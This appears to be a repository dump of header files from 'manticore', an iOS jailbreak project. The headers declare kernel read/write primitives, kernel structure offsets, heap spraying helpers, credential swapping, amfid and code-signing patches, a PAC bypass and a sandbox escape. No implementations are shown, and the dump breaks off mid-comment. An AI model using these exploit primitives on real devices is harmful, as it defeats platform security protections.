typedef io_object_t io_registry_entry_t;
typedef io_object_t io_service_t;
typedef io_object_t io_connect_t;
typedef io_object_t io_iterator_t;

#ifndef IO_OBJECT_NULL
#define IO_OBJECT_NULL (0)
#endif

// NVRAM property keys; not referenced by anything else in this header.
#define kBootNoncePropertyKey "com.apple.System.boot-nonce"
#define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
#define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY"

// ipc_port bit masks and kobject type numbers; none of the functions declared
// below take them, so they are here for callers that inspect port objects.
#define IO_BITS_PORT_INFO 0x0000f000
#define IO_BITS_KOTYPE 0x00000fff
#define IO_BITS_OTYPE 0x7fff0000
#define IO_BITS_ACTIVE 0x80000000

#define IKOT_NONE 0
#define IKOT_THREAD 1
#define IKOT_TASK 2
#define IKOT_HOST 3
#define IKOT_HOST_PRIV 4
#define IKOT_PROCESSOR 5
#define IKOT_PSET 6
#define IKOT_PSET_NAME 7
#define IKOT_TIMER 8
#define IKOT_PAGING_REQUEST 9
#define IKOT_MIG 10
#define IKOT_MEMORY_OBJECT 11
#define IKOT_XMM_PAGER 12
#define IKOT_XMM_KERNEL 13
#define IKOT_XMM_REPLY 14
#define IKOT_UND_REPLY 15
#define IKOT_HOST_NOTIFY 16
#define IKOT_HOST_SECURITY 17
#define IKOT_LEDGER 18
#define IKOT_MASTER_DEVICE 19
#define IKOT_TASK_NAME 20
#define IKOT_SUBSYSTEM 21
#define IKOT_IO_DONE_QUEUE 22
#define IKOT_SEMAPHORE 23
#define IKOT_LOCK_SET 24
#define IKOT_CLOCK 25
#define IKOT_CLOCK_CTRL 26
#define IKOT_IOKIT_SPARE 27
#define IKOT_NAMED_ENTRY 28
#define IKOT_IOKIT_CONNECT 29
#define IKOT_IOKIT_OBJECT 30
#define IKOT_UPL 31
#define IKOT_MEM_OBJ_CONTROL 32
#define IKOT_AU_SESSIONPORT 33
#define IKOT_FILEPORT 34
#define IKOT_LABELH 35
#define IKOT_TASK_RESUME 36

// Option flag for IOCFSerialize().
enum
{
    kIOCFSerializeToBinary = 0x00000001U,
};

// Tag words of the OSSerialize binary format: the top bits carry the type
// (kOSSerializeTypeMask) and end-of-collection flag, the low 24 bits carry a
// length or value (kOSSerializeDataMask).
enum
{
    kOSSerializeDictionary = 0x01000000U,
    kOSSerializeArray = 0x02000000U,
    kOSSerializeSet = 0x03000000U,
    kOSSerializeNumber = 0x04000000U,
    kOSSerializeSymbol = 0x08000000U,
    kOSSerializeString = 0x09000000U,
    kOSSerializeData = 0x0a000000U,
    kOSSerializeBoolean = 0x0b000000U,
    kOSSerializeObject = 0x0c000000U,

    kOSSerializeTypeMask = 0x7F000000U,
    kOSSerializeDataMask = 0x00FFFFFFU,

    kOSSerializeEndCollection = 0x80000000U,

    kOSSerializeMagic = 0x000000d3U,
};

// Same value as kOSSerializeMagic above, under a second name.
#define kOSSerializeBinarySignature 0x000000D3U

extern const mach_port_t kIOMasterPortDefault;

CF_RETURNS_RETAINED CFDataRef IOCFSerialize(CFTypeRef object, CFOptionFlags options);
CFTypeRef IOCFUnserializeWithSize(const char *buf, size_t len, CFAllocatorRef allocator, CFOptionFlags options, CFStringRef *err);

kern_return_t IOObjectRetain(io_object_t object);
kern_return_t IOObjectRelease(io_object_t object);
boolean_t IOObjectConformsTo(io_object_t object, const io_name_t name);
uint32_t IOObjectGetKernelRetainCount(io_object_t object);
kern_return_t IOObjectGetClass(io_object_t object, io_name_t name);
CFStringRef IOObjectCopyClass(io_object_t object);
CFStringRef IOObjectCopySuperclassForClass(CFStringRef name);
CFStringRef IOObjectCopyBundleIdentifierForClass(CFStringRef name);

io_registry_entry_t IORegistryGetRootEntry(mach_port_t master);
kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name);
kern_return_t IORegistryEntryGetRegistryEntryID(io_registry_entry_t entry, uint64_t *entryID);
kern_return_t IORegistryEntryGetPath(io_registry_entry_t entry, const io_name_t plane, io_string_t path);
kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t name, io_struct_inband_t buffer, uint32_t *size);
kern_return_t IORegistryEntryCreateCFProperties(io_registry_entry_t entry, CFMutableDictionaryRef *properties, CFAllocatorRef allocator, uint32_t options);
CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options);
kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);

kern_return_t IORegistryCreateIterator(mach_port_t master, const io_name_t plane, uint32_t options, io_iterator_t *it);
kern_return_t IORegistryEntryCreateIterator(io_registry_entry_t entry, const io_name_t plane, uint32_t options, io_iterator_t *it);
kern_return_t IORegistryEntryGetChildIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it);
kern_return_t IORegistryEntryGetParentIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it);
io_object_t IOIteratorNext(io_iterator_t it);
boolean_t IOIteratorIsValid(io_iterator_t it);
void IOIteratorReset(io_iterator_t it);

// The matching dictionary is consumed (CF_RELEASES_ARGUMENT) by the two
// IOServiceGetMatching* calls; do not release it again after them.
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
CFMutableDictionaryRef IOServiceNameMatching(const char *name) CF_RETURNS_RETAINED;
io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
kern_return_t IOServiceGetMatchingServices(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT, io_iterator_t *it);
kern_return_t _IOServiceGetAuthorizationID(io_service_t service, uint64_t *authID);
kern_return_t _IOServiceSetAuthorizationID(io_service_t service, uint64_t authID);
kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client);
kern_return_t IOServiceClose(io_connect_t client);
kern_return_t IOCloseConnection(io_connect_t client);
kern_return_t IOConnectAddRef(io_connect_t client);
kern_return_t IOConnectRelease(io_connect_t client);
kern_return_t IOConnectGetService(io_connect_t client, io_service_t *service);
kern_return_t IOConnectAddClient(io_connect_t client, io_connect_t other);
kern_return_t IOConnectSetNotificationPort(io_connect_t client, uint32_t type, mach_port_t port, uintptr_t ref);
kern_return_t IOConnectMapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t *addr, mach_vm_size_t *size, uint32_t options);
kern_return_t IOConnectUnmapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t addr);
kern_return_t IOConnectSetCFProperties(io_connect_t client, CFTypeRef properties);
kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
kern_return_t IOConnectCallScalarMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt);
kern_return_t IOConnectCallStructMethod(io_connect_t client, uint32_t selector, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt);
kern_return_t IOConnectCallAsyncMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
kern_return_t IOConnectCallAsyncScalarMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt);
kern_return_t IOConnectCallAsyncStructMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt);
kern_return_t IOConnectTrap6(io_connect_t client, uint32_t index, uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d, uintptr_t e, uintptr_t f);
io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path);

#endif
155 |
--------------------------------------------------------------------------------
/manticore/include/lib/snappy/snappy.h:
--------------------------------------------------------------------------------
1 | /* Copyright 2018 Sam Bingner All Rights Reserved
2 | */
3 |
#ifndef _SNAPPY_H
#define _SNAPPY_H

#ifdef __cplusplus
extern "C" {
#endif

// APFS snapshot helpers for the rootfs work (see rootfs.mm).
// NOTE(review): this header includes nothing, yet snapshot_check uses `bool`;
// it only compiles in C if <stdbool.h> was included earlier by the includer
// (C++ has bool built in).
const char **snapshot_list(int dirfd);
bool snapshot_check(int dirfd, const char *name);
// Returns a heap string presumably owned by the caller — confirm in the .c file.
char *copySystemSnapshot(void);

#ifdef __cplusplus
}
#endif

#endif
20 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/iosurface.h:
--------------------------------------------------------------------------------
1 | //
2 | // IOSurfaceLib.h
3 | // manticore
4 | //
5 | // Created by Luca on 25.02.21.
6 | //
7 |
#ifndef IOSurfaceLib_h
#define IOSurfaceLib_h

#include
#include
#include

// User client port opened elsewhere (defined in a .c/.mm file, not here).
extern mach_port_t IOSurfaceRootUserClient;

#endif /* IOSurfaceLib_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/k_offsets.h:
--------------------------------------------------------------------------------
1 | //
2 | // k_offsets.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
#ifndef k_offsets_h
#define k_offsets_h

// Generate the name for an offset.
#define OFFSET(base_, object_) _##base_##__##object_##__offset_

// Generate the name for the size of an object.
#define SIZE(object_) _##object_##__size_
// Also typedef'd in exploit_main.h, k_utils.h and tq_common_p.h; identical
// redefinition is fine in C11/C++ but an error under C99.
// NOTE(review): this header includes nothing, so size_t/uint64_t must already be
// in scope in every includer.
typedef uint64_t kptr_t;
// The translation unit that defines Q_INTERNAL provides the storage for every
// variable below; all other includers see them as extern declarations.
#ifdef Q_INTERNAL
#define qexternal
#else
#define qexternal extern
#endif

// Parameters for ipc_entry.
qexternal size_t SIZE(ipc_entry);
qexternal size_t OFFSET(ipc_entry, ie_object);

// Parameters for ipc_port.
qexternal size_t OFFSET(ipc_port, ip_bits);
qexternal size_t OFFSET(ipc_port, ip_references);
qexternal size_t OFFSET(ipc_port, ip_kobject);

// Parameters for struct ipc_space.
qexternal size_t OFFSET(ipc_space, is_table_size);
qexternal size_t OFFSET(ipc_space, is_table);
qexternal size_t OFFSET(thread, jop_pid); // struct thread { struct machine_thread { jop_pid } }

// Parameters for struct task.
qexternal size_t OFFSET(task, map);
qexternal size_t OFFSET(task, itk_space);
qexternal size_t OFFSET(task, bsd_info);
qexternal size_t OFFSET(task, t_flags);

// Parameters for proc
qexternal size_t OFFSET(proc, le_next);
qexternal size_t OFFSET(proc, le_prev);
qexternal size_t OFFSET(proc, task);
qexternal size_t OFFSET(proc, p_ucred);
qexternal size_t OFFSET(proc, p_pid);
qexternal size_t OFFSET(proc, p_fd);
qexternal size_t OFFSET(proc, csflags);
qexternal size_t OFFSET(proc, gid);
qexternal size_t OFFSET(proc, rgid);
qexternal size_t OFFSET(proc, uid);
qexternal size_t OFFSET(proc, ruid);
// NOTE(review): both OFFSET(proc, p_pid) and OFFSET(proc, pid) are declared;
// whether they are the same field or one is stale is not visible here.
qexternal size_t OFFSET(proc, pid);

qexternal size_t OFFSET(filedesc, fd_ofiles);
qexternal size_t OFFSET(fileproc, fp_glob);
qexternal size_t OFFSET(fileglob, fg_data);
qexternal size_t OFFSET(pipe, buffer);

// Parameters for ucred
qexternal size_t OFFSET(ucred, cr_posix);
qexternal size_t OFFSET(ucred, cr_uid);
qexternal size_t OFFSET(ucred, cr_svuid);
qexternal size_t OFFSET(ucred, cr_ngroups);
qexternal size_t OFFSET(ucred, cr_groups);
qexternal size_t OFFSET(ucred, cr_svgid);
qexternal size_t OFFSET(ucred, cr_rgid);
qexternal size_t OFFSET(ucred, cr_label);

qexternal size_t SIZE(posix_cred);

// Parameters for OSDictionary.
qexternal size_t OFFSET(OSDictionary, count);
qexternal size_t OFFSET(OSDictionary, capacity);
qexternal size_t OFFSET(OSDictionary, dictionary);

// Parameters for OSString.
qexternal size_t OFFSET(OSString, string);

// Parameters for IOSurfaceRootUserClient.
qexternal size_t OFFSET(IOSurfaceRootUserClient, surfaceClients);
qexternal size_t OFFSET(IOSurfaceClient, surface);
qexternal size_t OFFSET(IOSurface, values);

// Parameters for VNode/VMount.
qexternal size_t OFFSET(vnode, vmount);

// Kernel addresses filled in by kernel_offsets_init() (presumably; its body is
// not in this header).
qexternal kptr_t kc_kernel_base;
qexternal kptr_t kc_kernel_map;
qexternal kptr_t kc_kernel_task;
qexternal kptr_t kc_IOSurfaceClient_vt;
qexternal kptr_t kc_IOSurfaceClient_vt_0;

#undef qexternal

#ifdef __cplusplus
extern "C" {
#endif

void kernel_offsets_init(void);

#ifdef __cplusplus
}
#endif

#endif /* k_offsets_h */
110 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/k_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // k_utils.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
#ifndef k_utils_h
#define k_utils_h
// Also typedef'd in exploit_main.h, k_offsets.h and tq_common_p.h. This header
// includes nothing, so uint64_t/uint32_t/pid_t/mach_port_t must already be in
// scope in every includer.
typedef uint64_t kptr_t;

#ifdef __cplusplus
extern "C" {
#endif

// One key/value pair of a kernel OSDictionary, both as kernel pointers.
struct kDictEntry {
    kptr_t key;
    kptr_t value;
};

// User-space mirror of a kernel OSDictionary. `data[0]` is a zero-length array
// (GNU extension) that must be the last member; the C99 spelling is `char data[];`.
struct kOSDict {
    kptr_t self_addr;
    kptr_t items_addr;
    uint32_t count;
    uint32_t cap;
    char **names;
    struct kDictEntry *items;
    char data[0];
};


kptr_t kproc_find_pid0(kptr_t proc);
kptr_t kproc_find_by_pid(pid_t pid);
kptr_t ipc_entry_lookup(mach_port_t port_name);
kptr_t port_name_to_ipc_port(mach_port_t port_name);
kptr_t port_name_to_kobject(mach_port_t port_name);
void debug_dump_ipc_port(mach_port_t port_name, kptr_t *kobj);
void proc_write_MACF(kptr_t proc, struct kOSDict *macf);
void prepare_fake_entitlements(void);
struct kDictEntry *borrow_fake_entitlement(const char *name);
// Returns a heap kOSDict; ownership/free routine is not declared here — confirm.
struct kOSDict *proc_fetch_MACF(kptr_t proc);
void debug_dump_proc_cred(kptr_t proc);

#ifdef __cplusplus
}
#endif

#endif /* k_utils_h */
50 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/kapi.h:
--------------------------------------------------------------------------------
1 | //
2 | // kapi.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/22.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
#ifndef kapi_h
#define kapi_h

#include
#include

#include

// __BEGIN_DECLS already opens an extern "C" block under C++; the explicit
// #ifdef __cplusplus block below nests a second one, which is harmless but
// redundant.
__BEGIN_DECLS

extern mach_port_t kernel_task_port;

#ifdef __cplusplus
extern "C" {
#endif

// Stage-0 primitives are blocks (so they can be swapped at runtime); the kapi_*
// functions below are the stable call interface used by the rest of the code.
extern void (^stage0_read)(kptr_t addr, void *data, size_t len);
extern uint32_t (^stage0_read32)(kptr_t addr);
extern uint64_t (^stage0_read64)(kptr_t addr);
extern kptr_t (^stage0_read_kptr)(kptr_t addr);

extern void (^stage0_write)(kptr_t addr, void *data, size_t len);
extern void (^stage0_write64)(kptr_t addr, uint64_t v);

void kapi_read(kptr_t addr, void *data, size_t len);
uint32_t kapi_read32(kptr_t addr);
uint64_t kapi_read64(kptr_t addr);
kptr_t kapi_read_kptr(kptr_t addr);

// kapi_write reports nothing, while the fixed-width writers return a bool —
// callers of kapi_write have no way to notice a failed write.
void kapi_write(kptr_t addr, void *data, size_t len);
bool kapi_write32(kptr_t addr, uint32_t value);
bool kapi_write64(kptr_t addr, uint64_t value);

#ifdef __cplusplus
}
#endif

__END_DECLS

#endif /* kapi_h */
49 |
50 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/tq_common_p.h:
--------------------------------------------------------------------------------
1 | //
2 | // mycommon.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
#ifndef mycommon_h
#define mycommon_h

#include
#include

// Element count of a fixed-size array (not valid on a pointer).
#define arrayn(array) (sizeof(array)/sizeof((array)[0]))

typedef uint64_t kptr_t; // 64 bit CPU only

// Process-wide exploit state; the single instance is g_exp below. Which fields
// are filled by sys_init() versus later stages is not visible from this header.
struct exploit_common_s {
    bool debug;
    bool has_PAC;
    const char *model;
    const char *osversion;
    const char *osproductversion;
    const char *machine;
    const char *kern_version;

    int64_t physmemsize;
    uint64_t pagesize;

    kptr_t kernel_base;
    kptr_t kernel_task;
    kptr_t kernel_map;
    kptr_t kernel_proc;

    kptr_t self_proc;
    kptr_t self_task;
    kptr_t self_task_pac;
    kptr_t self_ipc_space;
    kptr_t kernel_slide;

    kptr_t text_slide;
    kptr_t data_slide;
    kptr_t zone_array;

    uint32_t num_zones;
};

extern struct exploit_common_s g_exp;

#ifdef __cplusplus
extern "C" {
#endif

// Also declared (with the same signature) in exploit_main.h.
uint32_t iosurface_create_fast(void);
uint32_t iosurface_s_get_ycbcrmatrix(void);
void iosurface_s_set_indexed_timestamp(uint64_t v);

void sys_init(void);
void print_os_details(void);

#ifdef __cplusplus
}
#endif

#endif /* mycommon_h */
67 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/user_kernel_alloc.h:
--------------------------------------------------------------------------------
1 | //
2 | // user_kernel_alloc.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/30.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
#ifndef user_kernel_alloc_h
#define user_kernel_alloc_h

#ifdef __cplusplus
extern "C" {
#endif

// NOTE(review): no includes here, yet bool/size_t/uint32_t and a block type are
// used; the includer must have pulled those in first.
bool IOSurface_init(void);

// Pipe helpers. pipe_count is an out-parameter of create_pipes and an input to
// the others. The `pipefds` parameter name shadows the file-scope static of the
// same name in exploit_main.h when both headers are included (legal, but
// -Wshadow will flag it).
int *create_pipes(size_t *pipe_count);
void close_pipes(int *pipefds, size_t pipe_count);
void pipe_close(int pipefds[2]);
// `update` is invoked per pipe to customise the buffer before it is written;
// the return value's meaning is not documented here — confirm in the .c file.
size_t pipe_spray(const int *pipefds, size_t pipe_count,
        void *pipe_buffer, size_t pipe_buffer_size,
        void (^update)(uint32_t pipe_index, void *data, size_t size));

#ifdef __cplusplus
}
#endif

#endif /* user_kernel_alloc_h */
30 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef utils_h
10 | #define utils_h
11 |
12 | #include
13 | #include
14 |
15 | #ifdef __cplusplus
16 | extern "C" {
17 | #endif
18 |
19 | void util_hexprint(void *data, size_t len, const char *desc);
20 | void util_hexprint_width(void *data, size_t len, int width, const char *desc);
21 | void util_nanosleep(uint64_t nanosecs);
22 | void util_msleep(unsigned int ms);
23 | _Noreturn void fail_info(const char *info);
24 | void fail_if(bool cond, const char *fmt, ...) __printflike(2, 3);
25 |
26 | // don't like macro
27 | void util_debug(const char *fmt, ...) __printflike(1, 2);
28 | void util_info(const char *fmt, ...) __printflike(1, 2);
29 | void util_warning(const char *fmt, ...) __printflike(1, 2);
30 | void util_error(const char *fmt, ...) __printflike(1, 2);
31 | void util_printf(const char *fmt, ...) __printflike(1, 2);
32 |
33 | int util_runCommand(const char *cmd, ...);
34 |
35 | void post_exploit(void);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif /* utils_h */
42 |
--------------------------------------------------------------------------------
/manticore/include/manticore/amfid.h:
--------------------------------------------------------------------------------
1 | //
2 | // amfid.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef amfid_h
9 | #define amfid_h
10 |
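#ifdef __cplusplus
extern "C" {
#endif

/*
 * mach_vm_region is exported by the system library but the iOS SDK ships no
 * prototype for it, hence the local declaration. The signature must match the
 * system's own; do not alter it.
 */
kern_return_t mach_vm_region (vm_map_t target_task,
                              mach_vm_address_t *address,
                              mach_vm_size_t *size,
                              vm_region_flavor_t flavor,
                              vm_region_info_t info,
                              mach_msg_type_number_t *infoCnt,
                              mach_port_t *object_name);

/*
 * Applies the amfid patches and returns a kernel pointer (kptr_t) whose exact
 * meaning is defined by the implementation. Declared inside the extern "C"
 * block so that Objective-C++ callers link against the C symbol, and with an
 * explicit (void) parameter list so the call is type-checked.
 *
 * Requires kptr_t (from util/kutils.h) to be in scope before this header.
 */
kptr_t perform_amfid_patches(void);

#ifdef __cplusplus
}
#endif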
28 |
29 | #endif /* amfid_h */
30 |
--------------------------------------------------------------------------------
/manticore/include/manticore/jailbreak.h:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 |
9 | #ifndef jailbreak_h
10 | #define jailbreak_h
11 |
12 | #include
13 |
14 | #ifdef __cplusplus
15 | extern "C" {
16 | #endif
17 |
18 | int jailbreak(void);
19 | bool setup_manticore_filesystem(void);
20 | uint64_t root_patch(uint64_t task_pac);
21 | int sb_allow_ndefault(void);
22 | bool check_sandbox_escape(void);
23 |
24 | #ifdef __cplusplus
25 | }
26 | #endif
27 |
28 | #endif /* jailbreak_h */
29 |
--------------------------------------------------------------------------------
/manticore/include/manticore/kernel_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_utils.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef kernel_utils_h
9 | #define kernel_utils_h
10 |
11 | #include
12 |
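/*
 * Expands to the identifier of a named offset variable, e.g.
 * OFFSET(task, map) -> _task__map__offset_. The variables themselves are
 * defined elsewhere.
 */
#define OFFSET(base_, object_) _##base_##__##object_##__offset_
/* Also typedef'd identically in util/kutils.h; C11 allows the duplicate. */
typedef unsigned long long addr_t;

/* kptr_t, pid_t and size_t must already be in scope via the include above. */

#ifdef __cplusplus
extern "C" {
#endif

/*
 * Credential-swapping helpers. Descriptions are inferred from the names;
 * confirm against the implementation before relying on them.
 */
/* Runs `function` while this process presumably carries kernel credentials; returns success. */
bool execute_with_kernel_credentials(void (^function)(void));
/* Kernel address of the proc struct for `pid` (presumably KPTR_NULL if not found). */
kptr_t get_proc_struct_for_pid(pid_t pid);
/* Sets (set == true) or presumably clears the platform-binary flag on `proc`. */
bool set_platform_binary(kptr_t proc, bool set);
/* Kernel vnode pointer backing file descriptor `fd` of `proc`. */
kptr_t find_vnode_with_fd(kptr_t proc, int fd);

/* Installs the credentials at `cred_addr` on `proc`; presumably returns the previous ones. */
kptr_t give_creds_to_proc_at_addr(kptr_t proc, kptr_t cred_addr);
/* Runs `function` with `proc` temporarily holding `credentials`; returns success. */
bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));

/* Copies `size` bytes from kernel address `where` into `p`; presumably returns bytes read. */
size_t kread(kptr_t where, void* p, size_t size);
/* Kernel address of the allproc list head. Explicit (void): `()` would declare an unprototyped function in C. */
kptr_t find_allproc(void);
/* Kernel proc address for `pid` as a plain uint64_t (compare get_proc_struct_for_pid). */
uint64_t proc_of_pid(pid_t pid);
/* The second, identical declaration of find_vnode_with_fd that used to follow here was redundant and is dropped. */

#ifdef __cplusplus
}
#endif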
37 |
38 | #endif /* kernel_utils_h */
39 |
--------------------------------------------------------------------------------
/manticore/include/manticore/pac.h:
--------------------------------------------------------------------------------
1 | //
2 | // pac.h
3 | // manticore
4 | //
5 | // Created by Luca on 30.04.21.
6 | //
7 |
8 | #ifndef pac_h
9 | #define pac_h
10 |
11 | bool bypassPAC(void);
12 |
13 | #endif /* pac_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/manticore/rootfs.h:
--------------------------------------------------------------------------------
1 | //
2 | // rootfs.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef rootfs_h
9 | #define rootfs_h
10 |
11 | #include
12 |
13 | #ifdef __cplusplus
14 | extern "C" {
15 | #endif
16 |
17 | void start_rootfs_remount(void);
18 | int remount_rootfs(kptr_t proc);
19 | bool check_root_write(void);
20 | bool check_root_read(void);
21 |
22 | #ifdef __cplusplus
23 | }
24 | #endif
25 |
26 | #endif /* rootfs_h */
27 |
--------------------------------------------------------------------------------
/manticore/include/manticore/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #include
9 |
10 |
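/*
 * Include guard added: this header had none, so including it twice in one
 * translation unit redefined struct proc_cred. The name is distinct from the
 * `utils_h` guard used by lib/tq/utils.h so the two headers can coexist.
 */
#ifndef manticore_utils_h
#define manticore_utils_h

/*
 * Saved credential-related fields of a proc, as handed back by
 * proc_set_root_cred so the caller can presumably restore them later.
 */
struct proc_cred {
    char posix_cred[0x100]; // HACK big enough -- opaque copy, sized generously rather than to the kernel struct
    kptr_t cr_label;
    kptr_t sandbox_slot;
};

#ifdef __cplusplus
extern "C" {
#endif

/*
 * NOTE(review): a `static` object defined in a header gives every translation
 * unit that includes it a private copy of self_macf; the copies are not shared.
 * Kept because callers may depend on the declaration, but it should live in one
 * source file with an `extern` declaration here.
 */
static struct kOSDict *self_macf;

/* Descriptions below are inferred from the signatures; confirm against the implementation. */
bool patch_TF_PLATFORM(kptr_t task);
/* Gives `proc` root credentials; if `old_cred` is non-NULL, presumably receives the previous values. */
void proc_set_root_cred(kptr_t proc, struct proc_cred **old_cred);
int perform_root_patches(kptr_t ucred);
/* Caller presumably owns the returned string; check the implementation for the allocator used. */
char *get_path_for_pid(pid_t pid);
pid_t pid_of_process(const char *name);
bool restartSpringBoard(void);
/* Spawns `cmd` with `argv`; `unrestrict` is invoked with the child pid; `wait`/`quiet` control blocking and output. */
int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t), bool wait, bool quiet);
pid_t look_for_proc(const char *proc_name);
pid_t look_for_proc_basename(const char *base_name);
void patch_amfid(pid_t amfid_pid);
void patch_codesign(void);
bool setCSFlagsByPID(pid_t pid);
/* Returns the code-directory hash of `file`; ownership of the buffer is not documented here. */
void *CDHashFor(char *file);
bool isSymlink(const char *filename);
bool isDirectory(const char *filename);
bool isMountpoint(const char *filename);
bool deleteFile(const char *file);
/* ensure*: create the object if missing and presumably fix up owner/mode; return success. */
bool ensureDirectory(const char *directory, int owner, mode_t mode);
bool ensureSymlink(const char *to, const char *from);
bool ensureFile(const char *file, int owner, mode_t mode);
int waitForFile(const char *filename);
void *userspace_PAC_hack(mach_port_t target_thread, void *pc);

#ifdef __cplusplus
}
#endif

#endif /* manticore_utils_h */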
47 |
--------------------------------------------------------------------------------
/manticore/include/offset_finder/offset_finder.h:
--------------------------------------------------------------------------------
1 | //
2 | // offset_finder.h
3 | // manticore
4 | //
5 | // Created by admin on 8/3/21.
6 | //
7 |
8 | #ifndef offset_finder_h
9 | #define offset_finder_h
10 |
11 | kptr_t get_kernel_cred_addr(kptr_t kernel_proc);
12 | kptr_t get_kernel_vm_map(kptr_t kernel_task);
13 |
14 | kptr_t find_kernel_task(void *kbase, size_t ksize);
15 | void init_offset_finder(kptr_t kernel_base);
16 |
17 | #endif /* offset_finder_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/util/alloc.h:
--------------------------------------------------------------------------------
1 | //
2 | // alloc.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef alloc_h
9 | #define alloc_h
10 |
11 | #include
12 |
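/*
 * free(x) only when x is non-NULL. The argument is expanded twice, so pass a
 * plain lvalue rather than an expression with side effects.
 */
#define SafeFree(x) do { if ((x)) free((x)); } while (false)
/* SafeFree followed by resetting the pointer, so a later SafeFree is a no-op. */
#define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while (false)

/*
 * Allocates exactly one object of the type `x` points to and assigns it to
 * `x`, throwing via MANTICORE_THROW_ON_NULL when malloc fails.
 *
 * NOTE(review): `sz` is accepted but never used -- the allocation is always
 * sizeof(*x) bytes. A caller passing a larger size and expecting a buffer of
 * that size will overflow it. Honouring `sz` here would change behaviour for
 * existing callers, so audit the call sites before doing that.
 */
#define SafeAlloc(x, sz) do { (x) = (typeof(x))malloc(sizeof(*(x))); MANTICORE_THROW_ON_NULL(x); } while (false)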
17 |
18 | #endif /* alloc_h */
19 |
--------------------------------------------------------------------------------
/manticore/include/util/arm.h:
--------------------------------------------------------------------------------
1 | //
2 | // arm.h
3 | // manticore
4 | //
5 | // Created by 21 on 14.03.21.
6 | //
7 |
8 | #ifndef arm_h
9 | #define arm_h
10 |
11 | int is_pac(void);
12 |
13 | #endif /* arm_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/util/error.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // error.hpp
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef error_h
9 | #define error_h
10 |
11 | #include
12 |
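/*
 * Sanity-check macros. Each expands to a single statement (do { } while (0)),
 * so they are safe inside an unbraced if/else -- the previous bare `if` form
 * would have captured a following `else`. Terminate a use with a semicolon.
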